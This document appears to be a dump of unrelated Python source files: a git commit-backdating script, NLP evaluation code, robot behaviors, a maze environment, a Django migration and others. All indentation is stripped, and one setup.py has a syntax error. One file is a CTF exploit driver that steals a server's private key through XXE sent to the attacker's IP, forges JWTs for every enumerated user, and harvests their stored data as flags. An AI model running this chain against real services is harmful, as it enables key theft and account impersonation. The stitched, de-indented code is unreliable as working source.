def week_for_group(word_group):
# type: (List[str]) -> int
no_of_weeks = week_count_for_group(word_group)
return 26 - no_of_weeks // 2
def group_by_size(words, max_per_group=50):
# type: (List[str], int) -> List[List[str]]
groups = [] # type: List[List[str]]
current_group = [] # type: List[str]
for word in words:
group_size = week_count_for_group(current_group + [word])
if group_size > max_per_group:
groups.append(current_group)
current_group = [word]
else:
current_group.append(word)
if len(current_group) > 0:
groups.append(current_group)
return groups
def date_from_week_number(year, week_number):
date_str = '{}-W{}-0'.format(year, week_number)
return datetime.datetime.strptime(date_str, "%Y-W%W-%w")
def create_named_commits(repo_dir, words, start_year, name, email, commit_range=(6, 10)):
# type: (Path, List[str], int, str, str, Tuple[int, int]) -> None
repo = create_repo(Path(repo_dir))
groups = group_by_size(words)
print(groups)
for i, group in enumerate(groups):
print('Group: {}, {}'.format(i, group))
current_year = start_year + i
sentence = ' '.join(group)
word_mat = word_matrix(sentence)
week_number = week_for_group(group)
current_date = date_from_week_number(current_year, week_number) + datetime.timedelta(hours=10)
print('Sentence: {}, week: {}, start date: {}, word mat shape: {}'.format(sentence, week_number,
current_date, word_mat.shape))
for i in range(word_mat.shape[1]):
for j in range(word_mat.shape[0]):
if word_mat[j, i] == 1:
no_of_commits = np.random.randint(commit_range[0], commit_range[1])
for _ in range(no_of_commits):
create_commit(repo, 'hello_world', name, email, current_date)
current_date += datetime.timedelta(days=1)
"""
1) Create a test repo with words you want to write in dummy repository.
python3 -m commit_alphabets \
--repo_dir /tmp/test_repo \
--words LIFE,AND,UNIVERSE \
--start_year 1991 \
--name "Billi" \
--email abc@gmail.com
2) Push the newly created repository to github.
"""
if __name__ == '__main__':
Fire(create_named_commits)
|
# Copyright 2018 Babylon Partners. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# This source code is derived from SentEval source code.
# SentEval Copyright (c) 2017-present, Facebook, Inc.
# ==============================================================================
from __future__ import absolute_import, division, unicode_literals
import numpy as np
import sys
import logging
# Set PATHs
PATH_TO_SENTEVAL = '../'
PATH_TO_DATA = '../data'
import utils
sys.path.insert(0, PATH_TO_SENTEVAL)
import senteval
from similarity.fuzzy import fbow_jaccard_factory
# Set up logger
logging.basicConfig(format='%(asctime)s : %(name)s : %(message)s', level=logging.DEBUG)
def prepare(params, samples):
word_vec_path = utils.get_word_vec_path_by_name(params.word_vec_name)
word_count_path = params.word_count_path
norm = params.norm
params.wvec_dim = 300
_, params.word2id = utils.create_dictionary(samples)
params.word_vec = utils.get_wordvec(word_vec_path,
params.word2id,
norm=norm,
path_to_counts=word_count_path)
return
def batcher(params, batch):
batch = [sent if sent != [] else ['.'] for sent in batch]
embeddings = []
for sent in batch:
sentvec = []
for word in sent:
if word in params.word_vec:
sentvec.append(params.word_vec[word])
if not sentvec:
vec = np.zeros(params.wvec_dim)
sentvec.append(vec)
embeddings.append(sentvec)
return embeddings
if __name__ == "__main__":
transfer_tasks = ['STS12', 'STS13', 'STS14', 'STS15', 'STS16']
results = []
np.random.seed(1111)
for word_vec_name in ['glove']:
wv_path = utils.get_word_vec_path_by_name(word_vec_name)
# U = utils.load_wordvec_matrix(wv_path, lo=0, hi=100000)
# U = np.identity(300, dtype=np.float64)
U = np.random.normal(size=(300, 300))
fsimilarity = fbow_jaccard_factory(U)
logging.info('Word vectors: {0}'.format(word_vec_name))
logging.info('Similarity: {0}'.format('FBoW-Jaccard custom U'))
logging.info('BEGIN\n\n\n')
params_senteval = {
'task_path': PATH_TO_DATA
}
params_experiment = {
'word_vec_name': word_vec_name,
'similarity_name': 'fbow_jaccard'
}
params_senteval.update(params_experiment)
params_senteval['similarity'] = fsimilarity
se = senteval.engine.SE(params_senteval, batcher, prepare)
result = se.eval(transfer_tasks)
result_dict = {
'param': params_experiment,
'eval': result
}
results.append(result_dict)
|
def test_atyeo():
from ..atyeo import data
d = data()
shp = d.tensor.shape
for ii in range(3):
assert shp[ii] == len(d.axes[ii])
dx = data(xarray = True)
assert len(dx.sel(Antigen = 'S').shape) == 2
def test_alter():
from ..alter import data
d = data()
shp = d.tensor.shape
for ii in range(3):
assert shp[ii] == len(d.axes[ii])
assert d.tensor.shape[0] == d.matrix.shape[0]
assert d.matrix.shape[1] == len(d.axes[3])
ds = data(xarray=True)
assert "Fc" in ds
assert "gp120" in ds
def test_zohar():
from ..zohar import data, data3D
d = data()
shp = d.tensor.shape
for ii in range(4):
assert shp[ii] == len(d.axes[ii])
dx = data(xarray=True)
assert len(dx.sel(Antigen='S1').shape) == 3
d3 = data3D()
shp3 = d3.tensor.shape
for ii in range(3):
assert shp3[ii] == len(d3.axes[ii])
dx3 = data3D(xarray=True)
assert len(dx3.sel(Antigen='RBD').shape) == 2
def test_kaplonek():
from ..kaplonek import SpaceX, MGH, MGHds
s = SpaceX()
shp = s.tensor.shape
for ii in range(3):
assert shp[ii] == len(s.axes[ii])
sx = SpaceX(xarray=True)
assert len(sx.sel(Receptor='IgA').shape) == 2
m = MGH()
mhp = m.tensor.shape
for ii in range(3):
assert mhp[ii] == len(m.axes[ii])
ds = MGHds()
assert len(ds["Fc"].sel(Antigen='CMV').shape) == 3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger
from sara_flexbe_states.GetRosParam import GetRosParam
from sara_flexbe_behaviors.action_place_sm import Action_placeSM
from sara_flexbe_states.pose_gen_euler import GenPoseEuler
from sara_flexbe_states.TF_transform import TF_transformation
from flexbe_states.check_condition_state import CheckConditionState
from sara_flexbe_states.sara_say import SaraSay
from flexbe_states.flexible_calculation_state import FlexibleCalculationState
from flexbe_states.log_state import LogState
from flexbe_states.log_key_state import LogKeyState
from sara_flexbe_states.SetRosParam import SetRosParam
from sara_flexbe_states.SetKey import SetKey
from sara_flexbe_states.moveit_move import MoveitMove
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Tue Jul 11 2017
@author: Philippe La Madeleine
'''
class ActionWrapper_PlaceSM(Behavior):
'''
action wrapper pour place
'''
def __init__(self):
super(ActionWrapper_PlaceSM, self).__init__()
self.name = 'ActionWrapper_Place'
# parameters of this behavior
# references to used behaviors
self.add_behavior(Action_placeSM, 'Action_place')
# Additional initialization code can be added inside the following tags
# [MANUAL_INIT]
# [/MANUAL_INIT]
# Behavior comments:
# O 369 2
# Place|n1- where to put the object
# O 588 404
# Chercher un objet de type container (le plus proche?) et se deplacer la bas
def create(self):
# x:702 y:576, x:764 y:158, x:766 y:33
_state_machine = OperatableStateMachine(outcomes=['finished', 'failed', 'critical_fail'], input_keys=['Action'])
_state_machine.userdata.Action = ["Place", "table"]
_state_machine.userdata.Empty = None
_state_machine.userdata.IdlePos = "IdlePose"
# Additional creation code can be added inside the following tags
# [MANUAL_CREATE]
# [/MANUAL_CREATE]
with _state_machine:
# x:44 y:28
OperatableStateMachine.add('gripper contain',
GetRosParam(ParamName="behavior/GripperContent"),
transitions={'done': 'if contain something', 'failed': 'cause1'},
autonomy={'done': Autonomy.Off, 'failed': Autonomy.Off},
remapping={'Value': 'content'})
# x:222 y:497
OperatableStateMachine.add('Action_place',
self.use_behavior(Action_placeSM, 'Action_place'),
transitions={'finished': 'idlearm', 'failed': 'cause3'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit},
remapping={'pos': 'MapPosition'})
# x:39 y:367
OperatableStateMachine.add('genPoseArm',
GenPoseEuler(x=0.75, y=-0.25, z=0.85, roll=0, pitch=0, yaw=0),
transitions={'done': 'referential from robot to map'},
autonomy={'done': Autonomy.Off},
remapping={'pose': 'position'})
# x:8 y:433
OperatableStateMachine.add('referential from robot to map',
TF_transformation(in_ref="base_link", out_ref="map"),
transitions={'done': 'log pose', 'fail': 'log tf error'},
autonomy={'done': Autonomy.Off, 'fail': Autonomy.Off},
remapping={'in_pos': 'position', 'out_pos': 'MapPosition'})
# x:25 y:98
OperatableStateMachine.add('if contain something',
CheckConditionState(predicate=lambda x: x != ''),
transitions={'true': 'cond', 'false': 'say nothing in gripper'},
autonomy={'true': Autonomy.Off, 'false': Autonomy.Off},
remapping={'input_value': 'content'})
# x:209 y:98
OperatableStateMachine.add('say nothing in gripper',
SaraSay(sentence="It seems I have nothing in my gripper", input_keys=[], emotion=1, block=True),
transitions={'done': 'cause1'},
autonomy={'done': Autonomy.Off})
# x:28 y:236
OperatableStateMachine.add('construction phrase',
FlexibleCalculationState(calculation=lambda x: "I will place this "+str(x[0])+" on the "+str(x[1][1]), input_keys=["content", "Action"]),
transitions={'done': 'Say_Place_object'},
autonomy={'done': Autonomy.Off},
remapping={'content': 'content', 'Action': 'Action', 'output_value': 'sentence'})
# x:33 y:167
OperatableStateMachine.add('cond',
CheckConditionState(predicate=lambda x: x[1] != ''),
transitions={'true': 'construction phrase', 'false': 'cause2'},
autonomy={'true': Autonomy.Off, 'false': Autonomy.Off},
remapping={'input_value': 'Action'})
# x:257 y:413
OperatableStateMachine.add('log tf error',
LogState(text="tf error", severity=Logger.REPORT_HINT),
transitions={'done': 'cause3'},
autonomy={'done': Autonomy.Off})
# x:42 y:502
OperatableStateMachine.add('log pose',
LogKeyState(text="the placement pose will be: {}", severity=Logger.REPORT_HINT),
transitions={'done': 'Action_place'},
autonomy={'done': Autonomy.Off},
remapping={'data': 'MapPosition'})
# x:493 y:535
OperatableStateMachine.add('empty hand',
SetRosParam(ParamName="behavior/GripperContent"),
transitions={'done': 'finished'},
autonomy={'done': Autonomy.Off},
remapping={'Value': 'Empty'})
# x:448 y:54
OperatableStateMachine.add('cause1',
SetKey(Value="I didn't have any object in my gripper"),
transitions={'done': 'setrosparamcause'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'Key'})
# x:422 y:149
OperatableStateMachine.add('cause2',
SetKey(Value="I didn't know where to place the object."),
transitions={'done': 'setrosparamcause'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'Key'})
# x:575 y:158
OperatableStateMachine.add('setrosparamcause',
SetRosParam(ParamName="behavior/GPSR/CauseOfFailure"),
transitions={'done': 'failed'},
autonomy={'done': Autonomy.Off},
remapping={'Value': 'Key'})
# x:449 y:325
OperatableStateMachine.add('cause3',
SetKey(Value="I was unable to calculate how to place the object."),
transitions={'done': 'setrosparamcause'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'Key'})
# x:342 y:583
OperatableStateMachine.add('idlearm',
MoveitMove(move=True, waitForExecution=False, group="RightArm", watchdog=15),
transitions={'done': 'empty hand', 'failed': 'empty hand'},
autonomy={'done': Autonomy.Off, 'failed': Autonomy.Off},
remapping={'target': 'IdlePos'})
# x:706 y:460
OperatableStateMachine.add('Say_Place_It_This_Place',
SaraSay(sentence=lambda x: "I will place this "+x+" right there.", input_keys=[], emotion=0, block=True),
transitions={'done': 'finished'},
autonomy={'done': Autonomy.Off})
# x:35 y:301
OperatableStateMachine.add('Say_Place_object',
SaraSay(sentence=lambda x: x, input_keys=[], emotion=0, block=True),
transitions={'done': 'genPoseArm'},
autonomy={'done': Autonomy.Off})
return _state_machine
# Private functions can be added inside the following tags
# [MANUAL_FUNC]
# [/MANUAL_FUNC]
|
# coding: utf-8
"""
App Center Client
Microsoft Visual Studio App Center API # noqa: E501
OpenAPI spec version: preview
Contact: benedetto.abbenanti@gmail.com
Project Repository: https://github.com/b3nab/appcenter-sdks
"""
import pprint
import re # noqa: F401
import six
class NotificationConfigGoogleResult(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'google_api_key': 'string'
}
attribute_map = {
'google_api_key': 'google_api_key'
}
def __init__(self, google_api_key=None): # noqa: E501
"""NotificationConfigGoogleResult - a model defined in Swagger""" # noqa: E501
self._google_api_key = None
self.discriminator = None
self.google_api_key = google_api_key
@property
def google_api_key(self):
"""Gets the google_api_key of this NotificationConfigGoogleResult. # noqa: E501
GCM API key. # noqa: E501
:return: The google_api_key of this NotificationConfigGoogleResult. # noqa: E501
:rtype: string
"""
return self._google_api_key
@google_api_key.setter
def google_api_key(self, google_api_key):
"""Sets the google_api_key of this NotificationConfigGoogleResult.
GCM API key. # noqa: E501
:param google_api_key: The google_api_key of this NotificationConfigGoogleResult. # noqa: E501
:type: string
"""
if google_api_key is None:
raise ValueError("Invalid value for `google_api_key`, must not be `None`") # noqa: E501
self._google_api_key = google_api_key
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NotificationConfigGoogleResult):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
import unittest
from typing import List
import solution
class TestSolution(unittest.TestCase):
def setUp(self) -> None:
self.solution = solution.Solution()
def test_simple_get_gamma_epsilon(self) -> None:
binaries = file_read_helper('simple_input.txt')
gamma, epsilon = self.solution.get_gamma_epsilon(binaries)
self.assertEqual(gamma, 22)
self.assertEqual(epsilon, 9)
self.assertEqual(gamma * epsilon, 198)
def test_long_get_gamma_epsilon(self) -> None:
binaries = file_read_helper('long_input.txt')
gamma, epsilon = self.solution.get_gamma_epsilon(binaries)
self.assertEqual(gamma, 3875)
self.assertEqual(epsilon, 220)
self.assertEqual(gamma * epsilon, 852500)
def test_simple_get_ratings(self) -> None:
binaries = file_read_helper('simple_input.txt')
oxygen, co2 = self.solution.get_ratings(binaries)
self.assertEqual(oxygen, 23)
self.assertEqual(co2, 10)
self.assertEqual(oxygen * co2, 230)
def test_long_get_ratings(self) -> None:
binaries = file_read_helper('long_input.txt')
oxygen, co2 = self.solution.get_ratings(binaries)
self.assertEqual(oxygen, 2235)
self.assertEqual(co2, 451)
self.assertEqual(oxygen * co2, 1007985) # toolow 1007534
def file_read_helper(filename: str) -> List[str]:
lines = []
with open(filename, 'r', encoding='UTF-8') as file:
for line in file:
lines.append(line.strip())
return lines
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/python
# encoding: utf-8
# filename: formacaoAcademica.py
#
# scriptLattes V8
# Copyright 2005-2013: Jesús P. Mena-Chalco e Roberto M. Cesar-Jr.
# http://scriptlattes.sourceforge.net/
#
#
# Este programa é um software livre; você pode redistribui-lo e/ou
# modifica-lo dentro dos termos da Licença Pública Geral GNU como
# publicada pela Fundação do Software Livre (FSF); na versão 2 da
# Licença, ou (na sua opinião) qualquer versão.
#
# Este programa é distribuído na esperança que possa ser util,
# mas SEM NENHUMA GARANTIA; sem uma garantia implicita de ADEQUAÇÂO a qualquer
# MERCADO ou APLICAÇÃO EM PARTICULAR. Veja a
# Licença Pública Geral GNU para maiores detalhes.
#
# Você deve ter recebido uma cópia da Licença Pública Geral GNU
# junto com este programa, se não, escreva para a Fundação do Software
# Livre(FSF) Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
class FormacaoAcademica:
anoInicio = None
anoConclusao = None
tipo = ''
nomeInstituicao = ''
descricao = ''
def __init__(self, partesDoItem=None):
# partesDoItem[0]: Periodo da formacao Profissional
# partesDoItem[1]: Descricao da formacao Profissional
if partesDoItem != None: # Caso deseja-se usar setters
anos = partesDoItem[0].partition(" - ")
self.anoInicio = anos[0];
self.anoConclusao = anos[2];
detalhe = partesDoItem[1].partition(".")
self.tipo = detalhe[0].strip()
detalhe = detalhe[2].strip().partition(".")
self.nomeInstituicao = detalhe[0].strip()
self.descricao = detalhe[2].strip()
def format_anos(self, anos):
if(anos.count("-")):
return anos.split(" - ")
return (anos, anos)
def set_anos(self, anos):
a, b = self.format_anos(anos)
self.anoInicio = a
self.anoConclusao = b
def set_ano_conclusao(self, ano):
self.anoConclusao = ano
def set_tipo(self, tipo):
self.tipo = tipo
def set_nome_instituicao(self, nome):
self.nomeInstituicao = nome
# private
def format_descricao(self, desc):
linesbreaks = ["\n"]*len(desc)
return "".join([a+b for a, b in zip(desc, linesbreaks)])
def set_descricao(self, desc):
self.descricao = self.format_descricao(desc)
# ------------------------------------------------------------------------ #
def __str__(self):
s = "\n[FORMACAO ACADEMICA] \n"
s += "+ANO INICIO : " + self.anoInicio.encode('utf8','replace') + "\n"
s += "+ANO CONCLUS.: " + self.anoConclusao.encode('utf8','replace') + "\n"
s += "+TIPO : " + self.tipo.encode('utf8','replace') + "\n"
s += "+INSTITUICAO : " + self.nomeInstituicao.encode('utf8','replace') + "\n"
s += "+DESCRICAO : " + self.descricao.encode('utf8','replace') + "\n"
return s
|
#!/usr/bin/env python3.8
import fake_jwt
import xxe_handler
import exploit_api
from re import match, compile
regexp = compile(r'^[A-Z0-9]{31}=$')
def exploit_one_team(victim_url, last_dish_id, our_ip, our_port):
private_key = xxe_handler.stole_private_key(our_ip, our_port, victim_url)
token_header = exploit_api.get_header_with_token(victim_url)
users = []
dish_id = last_dish_id + 1
while True:
dish = exploit_api.get_dish(token_header, dish_id, victim_url)
if dish is None:
break
users.append(dish['createdBy'])
dish_id += 1
print(f'[+] Get users: {len(users)}')
maybe_flags = []
for user_id in users:
access_token = fake_jwt.get_fake_jwt_token(victim_url, user_id, private_key).decode()
user_token_header = {'Authorization': f'Bearer {access_token}'}
dishes_page = exploit_api.get_dishes(user_token_header, victim_url)
dishes = dishes_page['items']
print(f'[+] Get user dishes: {len(dishes)}')
for dish in dishes:
maybe_flags.append(dish['recipe'])
for ingredient in dish['ingredients']:
maybe_flags.append(ingredient['product']['manufacturer'])
flags = [f for f in maybe_flags if f is not None and match(regexp, f)]
return flags, dish_id
if __name__ == "__main__":
our_port = 20001
our_ip = "192.168.0.101"
victim_url = "http://192.168.0.101:5000"
last_dish_id = 0
flags, last_dish_id = exploit_one_team(victim_url, last_dish_id, our_ip, our_port)
print(flags)
|
# Import packages
import sys
import time
import numpy as np
if sys.version_info == 2:
import Tkinter as tk
else:
import tkinter as tk
from BaseEnvironment import BaseEnvironment
from BaseAgent import BaseAgent
# Implement the class MazeEnvironment based on the mother class BaseEnvironment
class MazeEnvironment(BaseEnvironment):
# Constructor
def __init__(self, env_info):
"""
Method used to setup a maze environment
params:
- env_info (dict): Dictionary containing enough information to setup a maze environment
"""
# Initialize the unit (number of pixels), height and width (number of units) of maze environment
self.unit = env_info.get('unit', 40)
self.height_unit = env_info.get('height', 10)
self.width_unit = env_info.get('width', 10)
# check that grid_height and grid_width both are positive, for the case in which such fields are
# setted by the input env_info not empty
assert self.height_unit > 0,'grid_height is not positive'
assert self.width_unit > 0,'grid_width is not positive'
# Initialize the list of obstacles in maze if required
self.obstacles = env_info.get('obstacles', [])
# Initialize dictionary for actions by agent
# Define a map (dictionary) having as keys integer values and as values bidimensional actions
self.map_actions = {0:(0,0), # no movement
1: (0,1), # up
2: (1,1), # up-right
3: (1,0), # right
4: (1,-1), # down-right
5: (0,-1), # down
6: (-1,-1), # down-left
7: (0,-1), # left
8:(-1,1)} # up-left
# Set number of actions attribute
self.num_actions = len(self.map_actions)
# Initialize the starting and goal position
self.start_loc = env_info.get('start_loc')
self.goal_loc = env_info.get('goal_loc')
# Initialize the tuple attribute reward_state_term
reward = None
state = None
done = False # Boolean used to indicate if the goal has been reached (True) or not (False)
self.reward_state_done = (reward, state, done)
# Create the main window for the environment
self.window = tk.Tk()
# set its title
self.window.title('Maze')
# set its geometry
self.window.geometry('{}x{}'.format((self.width_unit+1)*self.unit, (self.height_unit+1)*self.unit))
# Set the time of sleep between interactions with an agent
self.time_sleep = env_info.get('time_sleep',0.01)
# Build maze inside of the main window
self.__build_maze()
# Method used to build a maze
def __build_maze(self):
"""
Private Method used to create an interface of a maze environment
"""
# Create a window of rectangular area by using canvas
self.canvas = tk.Canvas(master=self.window, bg='white',
width=self.width_unit*self.unit, height=self.height_unit*self.unit)
# draw vertical lines
for c in range(0, self.width_unit*self.unit, self.unit):
x0, y0, x1, y1 = c, 0, c, self.height_unit*self.unit
self.canvas.create_line(x0, y0, x1, y1)
# draw horizontal lines
for c in range(0, self.height_unit*self.unit, self.unit):
x0, y0, x1, y1 = 0, c, self.width_unit*self.unit, c
self.canvas.create_line(x0, y0, x1, y1)
# Create the goal point of agent
goal_center = np.array([self.goal_loc[0], self.goal_loc[1]])*self.unit + self.unit/2.
self.goal_point = self.canvas.create_rectangle(goal_center[0] - self.unit/2., goal_center[1] - self.unit/2.,\
goal_center[0]+self.unit/2.,goal_center[1]+self.unit/2., \
fill='green')
# Create the starting point of agent
start_center = np.array([self.start_loc[0], self.start_loc[1]])*self.unit + self.unit/2.
self.start_point = self.canvas.create_rectangle(start_center[0]-self.unit/2., \
start_center[1]-self.unit/2.,\
start_center[0]+self.unit/2.,\
start_center[1]+self.unit/2.,\
fill='orange')
# Create an agent in the starting point
self.agent_point = self.canvas.create_oval(start_center[0]-self.unit/3., start_center[1]-self.unit/3.,\
start_center[0]+self.unit/3., start_center[1]+self.unit/3.,\
fill='red')
# Create the obstacles if required
if len(self.obstacles) > 0:
self.obstacles_points = []
for obstacle in self.obstacles:
obstacle_center = np.array([obstacle[0], obstacle[1]])*self.unit + self.unit/2.
self.obstacles_points.append(self.canvas.create_rectangle(obstacle_center[0]-self.unit/2., \
obstacle_center[1]-self.unit/2.,\
obstacle_center[0]+self.unit/2.,\
obstacle_center[1]+self.unit/2., fill='black'))
self.canvas.pack()
def render(self):
"""
Method used to show and to update the window for maze
"""
# Wait
time.sleep(self.time_sleep)
# show and update window
self.window.update()
def __get_state_as_integer(self, state):
"""
Method used to convert the agent's position (x,y) on an integer
Params:
- state --> tuple (x,y)
Returns:
- num_state --> integer value representing the input state
"""
# Extract coordinates
x = state[0]
y = state[1]
# check if such coordinate values corresponds to a position inside of the grid defined
assert (x < self.width_unit and x >= 0 and y < self.height_unit and y >= 0),\
'Position {} not inside of the Environment'.format(state)
# Compute the converted state
num_state = y*self.width_unit + x
return num_state
def reset(self):
"""
Method used to set the start location of agent and return it as an integer.
It's used also to set reward and termination term
Params: None
Returns:
- num_state --> integer corresponding to the starting state
"""
# Initialize reward and done
reward = None
done = False
# Move the agent to the starting point in the window
start_center = np.array([self.start_loc[0], self.start_loc[1]])*self.unit + self.unit/2.0
self.canvas.coords(self.agent_point, start_center[0]-self.unit/3., start_center[1]-self.unit/3., start_center[0]+self.unit/3., start_center[1]+self.unit/3.)
# set the attribute agent_loc
self.agent_loc = self.start_loc
# get the corresponding number of the starting state
num_state = self.__get_state_as_integer(self.agent_loc)
self.reward_state_done = (reward, num_state, done)
return num_state
def step(self,action):
"""
Method used to give a reward, a new state and termination signal when an action is taken by
an agent.
Params: action --> Integer representing an action by agent
{stop: 0, up: 1, right-up: 2, right: 3, right-down: 4, down: 5, left-down: 6, left: 7, left-up: 8 }
"""
# Get action of scape
action2d = self.map_actions[action]
# Extract components of action2d
Ax = action2d[0]
Ay = action2d[1]
# Compute the next state in basic of the input action
x = self.agent_loc[0]
y = self.agent_loc[1]
# Compute the next location of agent by remember the the limits of x and y
next_loc = (max(0,min(x+Ax, self.width_unit-1)), \
max(0,min(y+Ay, self.height_unit-1)))
# set reward to -1 and done to False
reward = -1.
done = False
# check if agent_loc is equal to goal_loc
if next_loc == self.goal_loc:
# set reward to 1 and done to True
reward = 1.
done = True
# otherwise check if the next location is an obstacle
elif next_loc in self.obstacles:
# set reward to -100
reward = -100.
# reset next_loc equal to the previous values
next_loc = (x, y)
# check if next loc is not equal to agent loc
if next_loc != self.agent_loc:
# Compute the components of effective movement for the case in which the choose action
# will bring the agent outside the waze
deltax, deltay = next_loc[0] - self.agent_loc[0], next_loc[1] - self.agent_loc[1]
# update agent_loc
self.agent_loc = next_loc
# update position of agent in the window
self.canvas.move(self.agent_point, deltax*self.unit, deltay*self.unit)
# update the attribute reward_state_term
state = self.__get_state_as_integer(self.agent_loc)
self.reward_state_done = (reward, state, done)
return self.reward_state_done
def close_window(self):
"""
Method used to close window
"""
self.window.quit()
self.window.destroy()
self.window.mainloop()
def cleanup(self):
"""
Method used to clean a few attributes
"""
pass
def main():
# Define the environment
env_info = {'height':6, 'width':6, 'start_loc':(0,0),'goal_loc':(5,5), 'obstacles':[(2,2),(3,3)]}
maze = MazeEnvironment(env_info)
# define the number of actions
num_actions = 9
# Starting
maze.reset()
maze.render()
# for each step
for _ in range(100):
# choose random action
action = np.random.choice(num_actions)
# execute action
(reward, state, done) = maze.step(action)
# update window
maze.render()
print('action:{}, reward:{}, state:{}, done:{}'.format(action, reward, state, done))
# close maze window
time.sleep(3)
maze.close_window()
if __name__ == '__main__':
main()
|
# Generated by Django 3.0.4 on 2020-07-02 16:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Newspaper',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('npName', models.CharField(max_length=50, verbose_name='Название газеты')),
('npEditorName', models.CharField(max_length=100, verbose_name='ФИО редактора')),
('npEditionIndex', models.IntegerField(verbose_name='Индекс издания')),
('npPrice', models.PositiveIntegerField(verbose_name='Цена экземпляра')),
],
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('oNpCount', models.IntegerField(verbose_name='Количество экземпляров')),
('oNpCode', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.Newspaper')),
],
),
migrations.CreateModel(
name='PostOffice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('poNum', models.PositiveIntegerField(verbose_name='Номер почтового отделения')),
('poAddress', models.CharField(max_length=500, verbose_name='Адрес почтового отделения')),
],
),
migrations.CreateModel(
name='PrintingHouse',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phName', models.CharField(max_length=50, verbose_name='Название типографии')),
('phAddress', models.CharField(max_length=500, verbose_name='Адрес типографии')),
('phWorkStatus', models.CharField(choices=[('открыта', 'открыта'), ('закрыта', 'закрыта')], max_length=100, verbose_name='Статус')),
],
),
migrations.CreateModel(
name='PrintRun',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('prPrintRun', models.PositiveIntegerField(verbose_name='Тираж')),
('prNpCode', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.Newspaper')),
('prOCode', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.Order')),
('prPhCode', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.PrintingHouse')),
],
),
migrations.AddField(
model_name='order',
name='oPoCode',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mainapp.PostOffice'),
),
]
|
# encoding: utf-8
"""
Copyright (c) 2009-2011 Johns Hopkins University. All rights reserved.
This software is provided AS IS under the terms of the Open Source MIT License.
See http://www.opensource.org/licenses/mit-license.php.
"""
from .vmo import VMOModel
from .double_rotation import VMODoubleRotation
from .session import VMOSession
from .placemap import CirclePlaceMap
from .trajectory import CircleTrackData
from .remapping import VMOExperiment, MismatchAnalysis, MismatchTrends
from .figures import *
|
from setuptools import find_packages, setup
from distutils.util import convert_path
setup(
name='tscli',
version='0.0.1'
description='JSONRPC 2.0 client',
author='',
license='APACHE 2.0',
install_requires=['colorama', 'argparse', 'pyyaml'],
setup_requires=[],
tests_require=['unittest'],
test_suite='unittest',
packages=['cli.*']
)
|
"""
$Revision: 1.5 $ $Date: 2010/04/28 12:41:08 $
Author: Martin Kuemmel (mkuemmel@stecf.org)
Affiliation: Space Telescope - European Coordinating Facility
WWW: http://www.stecf.org/software/slitless_software/axesim/
"""
from __future__ import absolute_import
__author__ = "Martin Kuemmel <mkuemmel@eso.org>"
__date__ = "$Date: 2010/04/28 12:41:08 $"
__version__ = "$Revision: 1.5 $"
__credits__ = """This software was developed by the ACS group of the Space Telescope -
European Coordinating Facility (ST-ECF). The ST-ECF is a department jointly
run by the European Space Agency and the European Southern Observatory.
It is located at the ESO headquarters at Garching near Munich. The ST-ECF
staff supports the European astronomical community in exploiting the research
opportunities provided by the earth-orbiting Hubble Space Telescope.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
"""
import os
import os.path
from . import axeutils
from .axeerror import aXeError
from .axeerror import aXeSIMError
class InputChecker(object):
def __init__(self, taskname, inlist=None, configs=None, backims=None):
"""
Initializes the class
"""
